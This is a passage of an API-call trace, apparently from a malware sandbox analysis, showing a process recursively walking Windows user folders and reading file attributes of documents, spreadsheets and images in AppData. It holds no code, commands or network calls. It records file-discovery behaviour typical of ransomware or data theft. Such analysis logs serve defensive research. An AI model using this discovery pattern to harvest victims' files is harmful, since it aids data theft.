lpFindFileData=0x12dc28 | out: lpFindFileData=0x12dc28) returned 0 [0043.708] FindClose (in: hFindFile=0x288780 | out: hFindFile=0x288780) returned 1 [0043.708] FindNextFileW (in: hFindFile=0x288740, lpFindFileData=0x12e188 | out: lpFindFileData=0x12e188) returned 1 [0043.708] FindFirstFileW (in: lpFileName="c:\\users\\default\\searches\\\\*", lpFindFileData=0x12dc28 | out: lpFindFileData=0x12dc28) returned 0x288780 [0043.714] FindNextFileW (in: hFindFile=0x288780, lpFindFileData=0x12dc28 | out: lpFindFileData=0x12dc28) returned 1 [0043.714] FindNextFileW (in: hFindFile=0x288780, lpFindFileData=0x12dc28 | out: lpFindFileData=0x12dc28) returned 1 [0043.714] GetFileAttributesExW (in: lpFileName="c:\\users\\default\\searches\\desktop.ini" (normalized: "c:\\users\\default\\searches\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x12de7c | out: lpFileInformation=0x12de7c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6c1c570, ftCreationTime.dwHighDateTime=0x1d2da0d, ftLastAccessTime.dwLowDateTime=0x6c1c570, ftLastAccessTime.dwHighDateTime=0x1d2da0d, ftLastWriteTime.dwLowDateTime=0x27feeae6, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x20c)) returned 1 [0043.715] FindNextFileW (in: hFindFile=0x288780, lpFindFileData=0x12dc28 | out: lpFindFileData=0x12dc28) returned 1 [0043.715] GetFileAttributesExW (in: lpFileName="c:\\users\\default\\searches\\Everywhere.search-ms" (normalized: "c:\\users\\default\\searches\\everywhere.search-ms"), fInfoLevelId=0x0, lpFileInformation=0x12de7c | out: lpFileInformation=0x12de7c*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x6c1c570, ftCreationTime.dwHighDateTime=0x1d2da0d, ftLastAccessTime.dwLowDateTime=0x6c1c570, ftLastAccessTime.dwHighDateTime=0x1d2da0d, ftLastWriteTime.dwLowDateTime=0x27feeae6, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xf8)) returned 1 [0043.715] FindNextFileW (in: hFindFile=0x288780, lpFindFileData=0x12dc28 | out: lpFindFileData=0x12dc28) returned 1 [0043.716] GetFileAttributesExW (in: lpFileName="c:\\users\\default\\searches\\Indexed Locations.search-ms" (normalized: "c:\\users\\default\\searches\\indexed locations.search-ms"), fInfoLevelId=0x0, lpFileInformation=0x12de7c | out: lpFileInformation=0x12de7c*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x6c426d0, ftCreationTime.dwHighDateTime=0x1d2da0d, ftLastAccessTime.dwLowDateTime=0x6c426d0, ftLastAccessTime.dwHighDateTime=0x1d2da0d, ftLastWriteTime.dwLowDateTime=0x27feeae6, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xf8)) returned 1 [0043.716] FindNextFileW (in: hFindFile=0x288780, lpFindFileData=0x12dc28 | out: lpFindFileData=0x12dc28) returned 0 [0043.716] FindClose (in: hFindFile=0x288780 | out: hFindFile=0x288780) returned 1 [0043.716] FindNextFileW (in: hFindFile=0x288740, lpFindFileData=0x12e188 | out: lpFindFileData=0x12e188) returned 1 [0043.716] FindFirstFileW (in: lpFileName="c:\\users\\default\\sendto\\\\*", lpFindFileData=0x12dc28 | out: lpFindFileData=0x12dc28) returned 0xffffffff [0043.716] FindNextFileW (in: hFindFile=0x288740, lpFindFileData=0x12e188 | out: lpFindFileData=0x12e188) returned 1 [0043.717] FindFirstFileW (in: lpFileName="c:\\users\\default\\start menu\\\\*", lpFindFileData=0x12dc28 | out: lpFindFileData=0x12dc28) returned 0xffffffff [0043.717] FindNextFileW (in: hFindFile=0x288740, lpFindFileData=0x12e188 | out: lpFindFileData=0x12e188) returned 1 [0043.717] FindFirstFileW (in: lpFileName="c:\\users\\default\\templates\\\\*", lpFindFileData=0x12dc28 | out: lpFindFileData=0x12dc28) returned 0xffffffff [0043.717] FindNextFileW (in: hFindFile=0x288740, lpFindFileData=0x12e188 | out: lpFindFileData=0x12e188) returned 1 [0043.717] FindFirstFileW (in: lpFileName="c:\\users\\default\\videos\\\\*", lpFindFileData=0x12dc28 | out: lpFindFileData=0x12dc28) returned 0x288780 [0043.717] FindNextFileW (in: hFindFile=0x288780, lpFindFileData=0x12dc28 | out: lpFindFileData=0x12dc28) returned 1 [0043.718] FindNextFileW (in: hFindFile=0x288780, lpFindFileData=0x12dc28 | out: lpFindFileData=0x12dc28) returned 1 [0043.718] GetFileAttributesExW (in: lpFileName="c:\\users\\default\\videos\\desktop.ini" (normalized: "c:\\users\\default\\videos\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x12de7c | out: lpFileInformation=0x12de7c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6c1c570, ftCreationTime.dwHighDateTime=0x1d2da0d, ftLastAccessTime.dwLowDateTime=0x6c1c570, ftLastAccessTime.dwHighDateTime=0x1d2da0d, ftLastWriteTime.dwLowDateTime=0x27c5c9df, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x1f8)) returned 1 [0043.718] FindNextFileW (in: hFindFile=0x288780, lpFindFileData=0x12dc28 | out: lpFindFileData=0x12dc28) returned 0 [0043.718] FindClose (in: hFindFile=0x288780 | out: hFindFile=0x288780) returned 1 [0043.718] FindNextFileW (in: hFindFile=0x288740, lpFindFileData=0x12e188 | out: lpFindFileData=0x12e188) returned 0 [0043.718] FindClose (in: hFindFile=0x288740 | out: hFindFile=0x288740) returned 1 [0043.718] FindNextFileW (in: hFindFile=0x284da0, lpFindFileData=0x12e6e8 | out: lpFindFileData=0x12e6e8) returned 1 [0043.719] FindFirstFileW (in: lpFileName="c:\\users\\default user\\\\*", lpFindFileData=0x12e188 | out: lpFindFileData=0x12e188) returned 0xffffffff [0043.719] FindNextFileW (in: hFindFile=0x284da0, lpFindFileData=0x12e6e8 | out: lpFindFileData=0x12e6e8) returned 1 [0043.719] GetFileAttributesExW (in: lpFileName="c:\\users\\desktop.ini" (normalized: "c:\\users\\desktop.ini"), fInfoLevelId=0x0, lpFileInformation=0x12e93c | out: lpFileInformation=0x12e93c*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6b61335c, ftCreationTime.dwHighDateTime=0x1ca043d, ftLastAccessTime.dwLowDateTime=0x6b61335c, ftLastAccessTime.dwHighDateTime=0x1ca043d, ftLastWriteTime.dwLowDateTime=0x6b61335c, ftLastWriteTime.dwHighDateTime=0x1ca043d, nFileSizeHigh=0x0, nFileSizeLow=0xae)) returned 1 [0043.719] FindNextFileW (in: hFindFile=0x284da0, lpFindFileData=0x12e6e8 | out: lpFindFileData=0x12e6e8) returned 1 [0043.719] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\\\*", lpFindFileData=0x12e188 | out: lpFindFileData=0x12e188) returned 0x288be8 [0043.719] FindNextFileW (in: hFindFile=0x288be8, lpFindFileData=0x12e188 | out: lpFindFileData=0x12e188) returned 1 [0043.719] FindNextFileW (in: hFindFile=0x288be8, lpFindFileData=0x12e188 | out: lpFindFileData=0x12e188) returned 1 [0043.720] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\appdata\\\\*", lpFindFileData=0x12dc28 | out: lpFindFileData=0x12dc28) returned 0x288ab8 [0043.720] FindNextFileW (in: hFindFile=0x288ab8, lpFindFileData=0x12dc28 | out: lpFindFileData=0x12dc28) returned 1 [0043.720] FindNextFileW (in: hFindFile=0x288ab8, lpFindFileData=0x12dc28 | out: lpFindFileData=0x12dc28) returned 1 [0043.720] FindNextFileW (in: hFindFile=0x288ab8, lpFindFileData=0x12dc28 | out: lpFindFileData=0x12dc28) returned 1 [0043.720] FindNextFileW (in: hFindFile=0x288ab8, lpFindFileData=0x12dc28 | out: lpFindFileData=0x12dc28) returned 1 [0043.720] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\\\*", lpFindFileData=0x12d6c8 | out: lpFindFileData=0x12d6c8) returned 0x288740 [0043.720] FindNextFileW (in: hFindFile=0x288740, lpFindFileData=0x12d6c8 | out: lpFindFileData=0x12d6c8) returned 1 [0043.721] FindNextFileW (in: hFindFile=0x288740, lpFindFileData=0x12d6c8 | out: lpFindFileData=0x12d6c8) returned 1 [0043.721] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\--TPex.swf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\--tpex.swf"), fInfoLevelId=0x0, lpFileInformation=0x12d91c | out: lpFileInformation=0x12d91c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa2fa8b70, ftCreationTime.dwHighDateTime=0x1d41bbb, ftLastAccessTime.dwLowDateTime=0x1413ba10, ftLastAccessTime.dwHighDateTime=0x1d4156e, ftLastWriteTime.dwLowDateTime=0x1413ba10, ftLastWriteTime.dwHighDateTime=0x1d4156e, nFileSizeHigh=0x0, nFileSizeLow=0x9cc0)) returned 1 [0043.721] FindNextFileW (in: hFindFile=0x288740, lpFindFileData=0x12d6c8 | out: lpFindFileData=0x12d6c8) returned 1 [0043.721] FindNextFileW (in: hFindFile=0x288740, lpFindFileData=0x12d6c8 | out: lpFindFileData=0x12d6c8) returned 1 [0043.721] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\2saZ9.docx" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\2saz9.docx"), fInfoLevelId=0x0, lpFileInformation=0x12d91c | out: lpFileInformation=0x12d91c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe0048320, ftCreationTime.dwHighDateTime=0x1d41276, ftLastAccessTime.dwLowDateTime=0x57bc2d00, ftLastAccessTime.dwHighDateTime=0x1d41899, ftLastWriteTime.dwLowDateTime=0x57bc2d00, ftLastWriteTime.dwHighDateTime=0x1d41899, nFileSizeHigh=0x0, nFileSizeLow=0x17c5c)) returned 1 [0043.722] FindNextFileW (in: hFindFile=0x288740, lpFindFileData=0x12d6c8 | out: lpFindFileData=0x12d6c8) returned 1 [0043.722] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\4I7KqzNu.odp" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\4i7kqznu.odp"), fInfoLevelId=0x0, lpFileInformation=0x12d91c | out: lpFileInformation=0x12d91c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x1fc7780, ftCreationTime.dwHighDateTime=0x1d42037, ftLastAccessTime.dwLowDateTime=0x5fb46020, ftLastAccessTime.dwHighDateTime=0x1d41d9b, ftLastWriteTime.dwLowDateTime=0x5fb46020, ftLastWriteTime.dwHighDateTime=0x1d41d9b, nFileSizeHigh=0x0, nFileSizeLow=0x80a9)) returned 1 [0043.722] FindNextFileW (in: hFindFile=0x288740, lpFindFileData=0x12d6c8 | out: lpFindFileData=0x12d6c8) returned 1 [0043.722] FindNextFileW (in: hFindFile=0x288740, lpFindFileData=0x12d6c8 | out: lpFindFileData=0x12d6c8) returned 1 [0043.723] FindNextFileW (in: hFindFile=0x288740, lpFindFileData=0x12d6c8 | out: lpFindFileData=0x12d6c8) returned 1 [0043.723] FindNextFileW (in: hFindFile=0x288740, lpFindFileData=0x12d6c8 | out: lpFindFileData=0x12d6c8) returned 1 [0043.723] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\adobe\\\\*", lpFindFileData=0x12d168 | out: lpFindFileData=0x12d168) returned 0x288780 [0043.731] FindNextFileW (in: hFindFile=0x288780, lpFindFileData=0x12d168 | out: lpFindFileData=0x12d168) returned 1 [0043.731] FindNextFileW (in: hFindFile=0x288780, lpFindFileData=0x12d168 | out: lpFindFileData=0x12d168) returned 1 [0043.731] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\adobe\\acrobat\\\\*", lpFindFileData=0x12cc08 | out: lpFindFileData=0x12cc08) returned 0x2897d8 [0043.735] FindNextFileW (in: hFindFile=0x2897d8, lpFindFileData=0x12cc08 | out: lpFindFileData=0x12cc08) returned 1 [0043.735] FindNextFileW (in: hFindFile=0x2897d8, lpFindFileData=0x12cc08 | out: lpFindFileData=0x12cc08) returned 1 [0043.735] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\adobe\\acrobat\\10.0\\\\*", lpFindFileData=0x12c6a8 | out: lpFindFileData=0x12c6a8) returned 0x2878f0 [0043.735] FindNextFileW (in: hFindFile=0x2878f0, lpFindFileData=0x12c6a8 | out: lpFindFileData=0x12c6a8) returned 1 [0043.735] FindNextFileW (in: hFindFile=0x2878f0, lpFindFileData=0x12c6a8 | out: lpFindFileData=0x12c6a8) returned 1 [0043.736] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\adobe\\acrobat\\10.0\\collab\\\\*", lpFindFileData=0x12c148 | out: lpFindFileData=0x12c148) returned 0x2879b8 [0043.736] FindNextFileW (in: hFindFile=0x2879b8, lpFindFileData=0x12c148 | out: lpFindFileData=0x12c148) returned 1 [0043.736] FindNextFileW (in: hFindFile=0x2879b8, lpFindFileData=0x12c148 | out: lpFindFileData=0x12c148) returned 0 [0043.736] FindClose (in: hFindFile=0x2879b8 | out: hFindFile=0x2879b8) returned 1 [0043.736] FindNextFileW (in: hFindFile=0x2878f0, lpFindFileData=0x12c6a8 | out: lpFindFileData=0x12c6a8) returned 1 [0043.736] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\adobe\\acrobat\\10.0\\forms\\\\*", lpFindFileData=0x12c148 | out: lpFindFileData=0x12c148) returned 0x2879b8 [0043.737] FindNextFileW (in: hFindFile=0x2879b8, lpFindFileData=0x12c148 | out: lpFindFileData=0x12c148) returned 1 [0043.737] FindNextFileW (in: hFindFile=0x2879b8, lpFindFileData=0x12c148 | out: lpFindFileData=0x12c148) returned 0 [0043.737] FindClose (in: hFindFile=0x2879b8 | out: hFindFile=0x2879b8) returned 1 [0043.737] FindNextFileW (in: hFindFile=0x2878f0, lpFindFileData=0x12c6a8 | out: lpFindFileData=0x12c6a8) returned 1 [0043.737] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\adobe\\acrobat\\10.0\\javascripts\\\\*", lpFindFileData=0x12c148 | out: lpFindFileData=0x12c148) returned 0x287930 [0043.738] FindNextFileW (in: hFindFile=0x287930, lpFindFileData=0x12c148 | out: lpFindFileData=0x12c148) returned 1 [0043.738] FindNextFileW (in: hFindFile=0x287930, lpFindFileData=0x12c148 | out: lpFindFileData=0x12c148) returned 1 [0043.738] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\adobe\\acrobat\\10.0\\javascripts\\glob.js" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\adobe\\acrobat\\10.0\\javascripts\\glob.js"), fInfoLevelId=0x0, lpFileInformation=0x12c39c | out: lpFileInformation=0x12c39c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xeb963630, ftCreationTime.dwHighDateTime=0x1d2da18, ftLastAccessTime.dwLowDateTime=0xeb963630, ftLastAccessTime.dwHighDateTime=0x1d2da18, ftLastWriteTime.dwLowDateTime=0x924964c0, ftLastWriteTime.dwHighDateTime=0x1d35e26, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0043.738] FindNextFileW (in: hFindFile=0x287930, lpFindFileData=0x12c148 | out: lpFindFileData=0x12c148) returned 1 [0043.739] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\adobe\\acrobat\\10.0\\javascripts\\glob.settings.js" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\adobe\\acrobat\\10.0\\javascripts\\glob.settings.js"), fInfoLevelId=0x0, lpFileInformation=0x12c39c | out: lpFileInformation=0x12c39c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xeb989790, ftCreationTime.dwHighDateTime=0x1d2da18, ftLastAccessTime.dwLowDateTime=0xeb989790, ftLastAccessTime.dwHighDateTime=0x1d2da18, ftLastWriteTime.dwLowDateTime=0x924964c0, ftLastWriteTime.dwHighDateTime=0x1d35e26, nFileSizeHigh=0x0, nFileSizeLow=0xa)) returned 1 [0043.739] FindNextFileW (in: hFindFile=0x287930, lpFindFileData=0x12c148 | out: lpFindFileData=0x12c148) returned 0 [0043.739] FindClose (in: hFindFile=0x287930 | out: hFindFile=0x287930) returned 1 [0043.739] FindNextFileW (in: hFindFile=0x2878f0, lpFindFileData=0x12c6a8 | out: lpFindFileData=0x12c6a8) returned 1 [0043.739] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\adobe\\acrobat\\10.0\\security\\\\*", lpFindFileData=0x12c148 | out: lpFindFileData=0x12c148) returned 0x2879b8 [0043.739] FindNextFileW (in: hFindFile=0x2879b8, lpFindFileData=0x12c148 | out: lpFindFileData=0x12c148) returned 1 [0043.740] FindNextFileW (in: hFindFile=0x2879b8, lpFindFileData=0x12c148 | out: lpFindFileData=0x12c148) returned 1 [0043.740] FindNextFileW (in: hFindFile=0x2879b8, lpFindFileData=0x12c148 | out: lpFindFileData=0x12c148) returned 1 [0043.740] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\adobe\\acrobat\\10.0\\security\\crlcache\\\\*", lpFindFileData=0x12bbe8 | out: lpFindFileData=0x12bbe8) returned 0x287a90 [0043.740] FindNextFileW (in: hFindFile=0x287a90, lpFindFileData=0x12bbe8 | out: lpFindFileData=0x12bbe8) returned 1 [0043.740] FindNextFileW (in: hFindFile=0x287a90, lpFindFileData=0x12bbe8 | out: lpFindFileData=0x12bbe8) returned 1 [0043.741] FindNextFileW (in: hFindFile=0x287a90, lpFindFileData=0x12bbe8 | out: lpFindFileData=0x12bbe8) returned 1 [0043.741] FindNextFileW (in: hFindFile=0x287a90, lpFindFileData=0x12bbe8 | out: lpFindFileData=0x12bbe8) returned 0 [0043.741] FindClose (in: hFindFile=0x287a90 | out: hFindFile=0x287a90) returned 1 [0043.741] FindNextFileW (in: hFindFile=0x2879b8, lpFindFileData=0x12c148 | out: lpFindFileData=0x12c148) returned 0 [0043.741] FindClose (in: hFindFile=0x2879b8 | out: hFindFile=0x2879b8) returned 1 [0043.741] FindNextFileW (in: hFindFile=0x2878f0, lpFindFileData=0x12c6a8 | out: lpFindFileData=0x12c6a8) returned 0 [0043.741] FindClose (in: hFindFile=0x2878f0 | out: hFindFile=0x2878f0) returned 1 [0043.741] FindNextFileW (in: hFindFile=0x2897d8, lpFindFileData=0x12cc08 | out: lpFindFileData=0x12cc08) returned 0 [0043.742] FindClose (in: hFindFile=0x2897d8 | out: hFindFile=0x2897d8) returned 1 [0043.742] FindNextFileW (in: hFindFile=0x288780, lpFindFileData=0x12d168 | out: lpFindFileData=0x12d168) returned 1 [0043.742] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\adobe\\flash player\\\\*", lpFindFileData=0x12cc08 | out: lpFindFileData=0x12cc08) returned 0x2897d8 [0043.743] FindNextFileW (in: hFindFile=0x2897d8, lpFindFileData=0x12cc08 | out: lpFindFileData=0x12cc08) returned 1 [0043.743] FindNextFileW (in: hFindFile=0x2897d8, lpFindFileData=0x12cc08 | out: lpFindFileData=0x12cc08) returned 1 [0043.743] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\adobe\\flash player\\assetcache\\\\*", lpFindFileData=0x12c6a8 | out: lpFindFileData=0x12c6a8) returned 0x287910 [0043.744] FindNextFileW (in: hFindFile=0x287910, lpFindFileData=0x12c6a8 | out: lpFindFileData=0x12c6a8) returned 1 [0043.744] FindNextFileW (in: hFindFile=0x287910, lpFindFileData=0x12c6a8 | out: lpFindFileData=0x12c6a8) returned 0 [0043.744] FindClose (in: hFindFile=0x287910 | out: hFindFile=0x287910) returned 1 [0043.744] FindNextFileW (in: hFindFile=0x2897d8, lpFindFileData=0x12cc08 | out: lpFindFileData=0x12cc08) returned 0 [0043.744] FindClose (in: hFindFile=0x2897d8 | out: hFindFile=0x2897d8) returned 1 [0043.744] FindNextFileW (in: hFindFile=0x288780, lpFindFileData=0x12d168 | out: lpFindFileData=0x12d168) returned 1 [0043.744] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\adobe\\headlights\\\\*", lpFindFileData=0x12cc08 | out: lpFindFileData=0x12cc08) returned 0x2897d8 [0043.745] FindNextFileW (in: hFindFile=0x2897d8, lpFindFileData=0x12cc08 | out: lpFindFileData=0x12cc08) returned 1 [0043.745] FindNextFileW (in: hFindFile=0x2897d8, lpFindFileData=0x12cc08 | out: lpFindFileData=0x12cc08) returned 0 [0043.745] FindClose (in: hFindFile=0x2897d8 | out: hFindFile=0x2897d8) returned 1 [0043.745] FindNextFileW (in: hFindFile=0x288780, lpFindFileData=0x12d168 | out: lpFindFileData=0x12d168) returned 1 [0043.745] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\adobe\\linguistics\\\\*", lpFindFileData=0x12cc08 | out: lpFindFileData=0x12cc08) returned 0x2897d8 [0043.746] FindNextFileW (in: hFindFile=0x2897d8, lpFindFileData=0x12cc08 | out: lpFindFileData=0x12cc08) returned 1 [0043.746] FindNextFileW (in: hFindFile=0x2897d8, lpFindFileData=0x12cc08 | out: lpFindFileData=0x12cc08) returned 1 [0043.746] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\adobe\\linguistics\\dictionaries\\\\*", lpFindFileData=0x12c6a8 | out: lpFindFileData=0x12c6a8) returned 0x287888 [0043.746] FindNextFileW (in: hFindFile=0x287888, lpFindFileData=0x12c6a8 | out: lpFindFileData=0x12c6a8) returned 1 [0043.746] FindNextFileW (in: hFindFile=0x287888, lpFindFileData=0x12c6a8 | out: lpFindFileData=0x12c6a8) returned 0 [0043.746] FindClose (in: hFindFile=0x287888 | out: hFindFile=0x287888) returned 1 [0043.746] FindNextFileW (in: hFindFile=0x2897d8, lpFindFileData=0x12cc08 | out: lpFindFileData=0x12cc08) returned 0 [0043.746] FindClose (in: hFindFile=0x2897d8 | out: hFindFile=0x2897d8) returned 1 [0043.746] FindNextFileW (in: hFindFile=0x288780, lpFindFileData=0x12d168 | out: lpFindFileData=0x12d168) returned 1 [0043.746] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\adobe\\logtransport2\\\\*", lpFindFileData=0x12cc08 | out: lpFindFileData=0x12cc08) returned 0x2897d8 [0043.747] FindNextFileW (in: hFindFile=0x2897d8, lpFindFileData=0x12cc08 | out: lpFindFileData=0x12cc08) returned 1 [0043.747] FindNextFileW (in: hFindFile=0x2897d8, lpFindFileData=0x12cc08 | out: lpFindFileData=0x12cc08) returned 0 [0043.747] FindClose (in: hFindFile=0x2897d8 | out: hFindFile=0x2897d8) returned 1 [0043.747] FindNextFileW (in: hFindFile=0x288780, lpFindFileData=0x12d168 | out: lpFindFileData=0x12d168) returned 0 [0043.747] FindClose (in: hFindFile=0x288780 | out: hFindFile=0x288780) returned 1 [0043.747] FindNextFileW (in: hFindFile=0x288740, lpFindFileData=0x12d6c8 | out: lpFindFileData=0x12d6c8) returned 1 [0043.748] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\Aij-NrrBF-zKxl.pdf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\aij-nrrbf-zkxl.pdf"), fInfoLevelId=0x0, lpFileInformation=0x12d91c | out: lpFileInformation=0x12d91c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb5b4bb30, ftCreationTime.dwHighDateTime=0x1d41357, ftLastAccessTime.dwLowDateTime=0x5c7a840, ftLastAccessTime.dwHighDateTime=0x1d4151e, ftLastWriteTime.dwLowDateTime=0x5c7a840, ftLastWriteTime.dwHighDateTime=0x1d4151e, nFileSizeHigh=0x0, nFileSizeLow=0x2b7b)) returned 1 [0043.748] FindNextFileW (in: hFindFile=0x288740, lpFindFileData=0x12d6c8 | out: lpFindFileData=0x12d6c8) returned 1 [0043.748] FindNextFileW (in: hFindFile=0x288740, lpFindFileData=0x12d6c8 | out: lpFindFileData=0x12d6c8) returned 1 [0043.748] FindNextFileW (in: hFindFile=0x288740, lpFindFileData=0x12d6c8 | out: lpFindFileData=0x12d6c8) returned 1 [0043.748] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\CIea_WygQiBTWc wX.jpg" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\ciea_wygqibtwc wx.jpg"), fInfoLevelId=0x0, lpFileInformation=0x12d91c | out: lpFileInformation=0x12d91c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xe3d8f0e0, ftCreationTime.dwHighDateTime=0x1d41bd0, ftLastAccessTime.dwLowDateTime=0xe3cd3bc0, ftLastAccessTime.dwHighDateTime=0x1d417d8, ftLastWriteTime.dwLowDateTime=0xe3cd3bc0, ftLastWriteTime.dwHighDateTime=0x1d417d8, nFileSizeHigh=0x0, nFileSizeLow=0x5444)) returned 1 [0043.749] FindNextFileW (in: hFindFile=0x288740, lpFindFileData=0x12d6c8 | out: lpFindFileData=0x12d6c8) returned 1 [0043.749] FindNextFileW (in: hFindFile=0x288740, lpFindFileData=0x12d6c8 | out: lpFindFileData=0x12d6c8) returned 1 [0043.749] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\HCS7PqsFuO_UzQ3.xls" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\hcs7pqsfuo_uzq3.xls"), fInfoLevelId=0x0, lpFileInformation=0x12d91c | out: lpFileInformation=0x12d91c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x233f4a70, ftCreationTime.dwHighDateTime=0x1d41160, ftLastAccessTime.dwLowDateTime=0xca445810, ftLastAccessTime.dwHighDateTime=0x1d410a2, ftLastWriteTime.dwLowDateTime=0xca445810, ftLastWriteTime.dwHighDateTime=0x1d410a2, nFileSizeHigh=0x0, nFileSizeLow=0x11a0)) returned 1 [0043.749] FindNextFileW (in: hFindFile=0x288740, lpFindFileData=0x12d6c8 | out: lpFindFileData=0x12d6c8) returned 1 [0043.750] FindNextFileW (in: hFindFile=0x288740, lpFindFileData=0x12d6c8 | out: lpFindFileData=0x12d6c8) returned 1 [0043.750] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\identities\\\\*", lpFindFileData=0x12d168 | out: lpFindFileData=0x12d168) returned 0x288780 [0043.750] FindNextFileW (in: hFindFile=0x288780, lpFindFileData=0x12d168 | out: lpFindFileData=0x12d168) returned 1 [0043.750] FindNextFileW (in: hFindFile=0x288780, lpFindFileData=0x12d168 | out: lpFindFileData=0x12d168) returned 1 [0043.750] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\identities\\{74a13782-b361-4204-9daa-0a3d49da4337}\\\\*", lpFindFileData=0x12cc08 | out: lpFindFileData=0x12cc08) returned 0x2897e8 [0043.751] FindNextFileW (in: hFindFile=0x2897e8, lpFindFileData=0x12cc08 | out: lpFindFileData=0x12cc08) returned 1 [0043.751] FindNextFileW (in: hFindFile=0x2897e8, lpFindFileData=0x12cc08 | out: lpFindFileData=0x12cc08) returned 0 [0043.751] FindClose (in: hFindFile=0x2897e8 | out: hFindFile=0x2897e8) returned 1 [0043.751] FindNextFileW (in: hFindFile=0x288780, lpFindFileData=0x12d168 | out: lpFindFileData=0x12d168) returned 0 [0043.751] FindClose (in: hFindFile=0x288780 | out: hFindFile=0x288780) returned 1 [0043.751] FindNextFileW (in: hFindFile=0x288740, lpFindFileData=0x12d6c8 | out: lpFindFileData=0x12d6c8) returned 1 [0043.751] FindNextFileW (in: hFindFile=0x288740, lpFindFileData=0x12d6c8 | out: lpFindFileData=0x12d6c8) returned 1 [0043.752] GetFileAttributesExW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\kf92CZO.csv" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\kf92czo.csv"), fInfoLevelId=0x0, lpFileInformation=0x12d91c | out: lpFileInformation=0x12d91c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3d18dda0, ftCreationTime.dwHighDateTime=0x1d41fd2, ftLastAccessTime.dwLowDateTime=0x2aa26040, ftLastAccessTime.dwHighDateTime=0x1d41011, ftLastWriteTime.dwLowDateTime=0x2aa26040, ftLastWriteTime.dwHighDateTime=0x1d41011, nFileSizeHigh=0x0, nFileSizeLow=0x16e4c)) returned 1 [0043.752] FindNextFileW (in: hFindFile=0x288740, lpFindFileData=0x12d6c8 | out: lpFindFileData=0x12d6c8) returned 1 [0043.752] FindNextFileW (in: hFindFile=0x288740, lpFindFileData=0x12d6c8 | out: lpFindFileData=0x12d6c8) returned 1 [0043.752] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\macromedia\\\\*", lpFindFileData=0x12d168 | out: lpFindFileData=0x12d168) returned 0x288780 [0043.753] FindNextFileW (in: hFindFile=0x288780, lpFindFileData=0x12d168 | out: lpFindFileData=0x12d168) returned 1 [0043.753] FindNextFileW (in: hFindFile=0x288780, lpFindFileData=0x12d168 | out: lpFindFileData=0x12d168) returned 1 [0043.753] FindFirstFileW (in: lpFileName="c:\\users\\eebsym5\\appdata\\roaming\\macromedia\\flash player\\\\*", lpFindFileData=0x12cc08 | out: lpFindFileData=0x12cc08) returned 0x2897e8 [0043.754] FindNextFileW (in: hFindFile=0x2897e8, 